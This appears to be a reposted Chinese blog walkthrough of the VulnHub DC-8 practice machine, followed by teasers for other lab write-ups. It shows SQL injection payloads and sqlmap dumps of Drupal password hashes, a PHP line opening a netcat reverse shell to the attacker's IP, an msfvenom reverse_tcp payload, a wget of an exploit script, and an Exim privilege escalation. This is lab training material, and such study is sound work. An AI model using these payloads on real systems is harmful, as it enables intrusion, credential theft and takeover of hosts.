摘要:按照网上的说法,代码保存后会执行代码,这应该是在靶机上已经执行了代码,只是在后台不会显示出来。
靶机信息
链接 | https://www.vulnhub.com/entry/dc-8,367/ |
---|---|
发布日期 | 2019年9月4日 |
作者 | DCAU |
难度 | 简单 |
打开vmware-文件-打开-DC-8.ova
将靶机网络适配器改为NAT模式
点击 ▶靶机,开启成功
为了避免漏扫,gobuster再进行目录扫描
http://192.168.30.206/?nid=2 and 1=1 --+
http://192.168.30.206/?nid=2 and 1=2 --+
http://192.168.30.206/?nid=2 order by 1 --+
http://192.168.30.206/?nid=2 order by 2 --+
所以可以看出字段数为1
http://192.168.30.206/?nid=-2 union select 1 --+
http://192.168.30.206/?nid=-2 union select group_concat(table_name) from
information_schema.tables where table_schema=‘d7db’ --+
http://192.168.30.206/?nid=-2 union select group_concat(column_name) from
information_schema.columns where table_name=‘users’ --+
http://192.168.30.206/?nid=-2 union select group_concat(name) from users --+
http://192.168.30.206/?nid=-2 union select group_concat(pass) from users --+
sqlmap -u "http://192.168.30.206/?nid=2" -current-db
sqlmap -u "http://192.168.30.206/?nid=2" -D d7db --tables
sqlmap -u "http://192.168.30.206/?nid=2" -D d7db -T users --columns
sqlmap -u "http://192.168.30.206/?nid=2" -D d7db -T users -C login,name,pass --dump
查询到两组数据
admin $S$D2tRcYRyqVFNSc0NvYUrYeQbLQg5koMKtihYTIDC9QQqJi3ICg5zjohn $S$DqupvJbxVmqjr6cYePnx2A891ln7lsuku/3if/oRVZJaz5mKC2vF
破解出john的密码trutle
发现ssh远程登录失败,发现需要使用公私钥登录
http://192.168.30.206/user
登录成功
发现保存并提交后并没有任何显示。按照网上的说法,php代码保存后会执行代码,这应该是在靶机上已经执行了代码,只是在后台不会显示出来。
我们尝试执行PHP反弹shell脚本,将原有的
flag
进行保留,防止报错<p>flag</p><?phpsystem("nc -e /bin/bash 192.168.30.182 4567");?>
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.30.182 lport=9999 R >php_shell.txt
python -c "import pty;pty.spawn("/bin/bash")"
find / -perm -u=s -type f 2>/dev/null
Exim version 4.89
wget http://192.168.30.182/46996.sh
进行赋权
执行,但是发现两种方法均发生错误
原因:这个报错是由于windows系统下编辑然后上传到linux系统执行导致的
解决方案:本地编辑查看文件类型:set ff=unix
使用第二个提权命令进行提权成功
./46996.sh -m netcat
这个靶机考察了目录扫描,sql注入,远程代码执行,反弹shell,提权时使用find查找可以执行的命令,对命令exim的版本提权漏洞等,是一个不错的靶机,适合新手来渗透
文章版权归作者所有,未经允许请勿转载,若此文章存在违规行为,您可以联系管理员删除。
转载请注明本文地址:https://www.ucloud.cn/yun/119203.html
靶机SickOs1.2的目录 0x01靶机描述0x02环境搭建0x03靶机渗透一、 信息收集二、 漏洞挖掘PUT方法任意写文件漏洞1. 查看web主页2. 查看/test目录支持的方法3. 验证PUT方法,向服务器写入文件4. 访问写入的文件 三、 漏洞利用反弹shell方法一:php一句话木马 + 蚁剑连接反弹shell方法二:curl上传php反弹shell脚本反弹shell方法三:...
摘要:目标是通过漏洞获得有限的权限访问,并随后以根用户身份升级权限。使用,并且在可能自行关闭的情况下非常罕见的情况,尝试强制重新启动机器,然后机器应该可以正常工作。 靶...
摘要:目标是通过漏洞获得有限的权限访问,然后权限升级为。使用,并且在可能自行关闭的情况下非常罕见的情况,尝试强制重新启动机器,然后机器应该可以正常工作。 靶机hackm...
靶机FristiLeaks1.3的目录 0x01靶机描述0x02环境搭建0x03靶机渗透一、 信息收集1. 主机发现2. 端口扫描3. 详细扫描4. dirb目录扫描5. 网站指纹识别 二、 漏洞挖掘base64解密1. 寻找url2. 查看源码,base64解密3. 登录成功 文件上传漏洞1. 尝试修改抓包修改后缀进行绕过,失败2. 进行多后缀文件上传3. 打开上传的文件,显示出...
摘要:菜鸡的第一篇学习分享靶机渗透测试实战一入门靶机完全渗透关于是一个特别好的渗透测试实战网站,提供了许多带有漏洞的渗透测试靶机下载。 菜鸡的第一篇学习分享 ——Vuln...
阅读 554·2023-04-25 20:32
阅读 1989·2021-11-24 10:27
阅读 4191·2021-09-29 09:47
阅读 1115·2021-09-29 09:34
阅读 2096·2021-09-28 09:36
阅读 3338·2021-09-22 15:27
阅读 2226·2021-09-06 15:00
阅读 487·2021-09-02 15:40